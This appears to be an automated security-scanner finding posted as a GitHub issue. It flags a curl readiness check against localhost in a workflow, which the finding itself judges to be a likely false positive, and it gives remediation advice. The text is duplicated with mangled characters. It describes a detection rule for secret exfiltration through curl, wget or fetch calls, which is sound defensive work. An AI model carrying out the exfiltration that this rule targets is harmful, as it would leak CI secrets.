π¨ Runner-Guard Security Finding
Rule: RGS-012 β Secret Exfiltration via Outbound HTTP Request
Severity: High
File: .github/workflows/daily-multi-device-docs-tester.lock.yml
Line: 488
Description
Runner-Guard's source-to-sink taint analysis detected a run: block containing an outbound HTTP request (curl) in a job context that also has access to secrets or publishing capabilities. The flagged step waits for a locally-launched documentation dev server to become ready:
- name: Wait for server readiness
run: |
...
until curl -sf (localhost/redacted) > /dev/null 2>&1; do
...
doneThis particular request targets localhost:4321 β almost certainly a false positive (it's a readiness check against the dev server started in the previous step). Runner-Guard flags it because the same job context can also read secrets, and the static analyzer cannot tell at compile time that the URL is bound to localhost only.
Impact
- The combination of outbound HTTP requests with secrets access in a workflow is the canonical secret-exfiltration shape; any rule-system tuned for supply-chain attacks must flag it.
- The actual risk here is low (localhost only, no secret values forwarded), but the noise reduces signal for future genuine RGS-012 findings.
Remediation
- Preferred: Restructure the wait step so the secret-bearing portion of the job runs after the localhost check completes (e.g., gate secret-using steps with
needs: on a separate readiness job that has no secrets).
- Acceptable: Suppress with a
# runner-guard:ignore RGS-012 annotation on the readiness step, documenting in a comment that the URL is bound to localhost only.
- Generic prevention: Audit all
curl/wget/fetch calls in workflows that touch secrets; ensure no secret values are placed in URLs, headers, or request bodies.
This is a new occurrence not covered by previously-closed RGS-012 issue (#30534), which only listed daily-model-inventory, docs-noob-tester, unbloat-docs, and visual-regression-checker.
Detected by runner-guard v2.6.0 β CI/CD source-to-sink vulnerability scanner
Workflow run: https://github.com/github/gh-aw/actions/runs/26144455365
Generated by π Static Analysis Report Β· β 24.4M Β· β·
π¨ Runner-Guard Security Finding
Rule: RGS-012 β Secret Exfiltration via Outbound HTTP Request
Severity: High
File:
.github/workflows/daily-multi-device-docs-tester.lock.ymlLine: 488
Description
Runner-Guard's source-to-sink taint analysis detected a
run:block containing an outbound HTTP request (curl) in a job context that also has access to secrets or publishing capabilities. The flagged step waits for a locally-launched documentation dev server to become ready:This particular request targets
localhost:4321β almost certainly a false positive (it's a readiness check against the dev server started in the previous step). Runner-Guard flags it because the same job context can also read secrets, and the static analyzer cannot tell at compile time that the URL is bound to localhost only.Impact
Remediation
needs:on a separate readiness job that has no secrets).# runner-guard:ignore RGS-012annotation on the readiness step, documenting in a comment that the URL is bound to localhost only.curl/wget/fetchcalls in workflows that touch secrets; ensure no secret values are placed in URLs, headers, or request bodies.This is a new occurrence not covered by previously-closed RGS-012 issue (#30534), which only listed
daily-model-inventory,docs-noob-tester,unbloat-docs, andvisual-regression-checker.Detected by runner-guard v2.6.0 β CI/CD source-to-sink vulnerability scanner
Workflow run: https://github.com/github/gh-aw/actions/runs/26144455365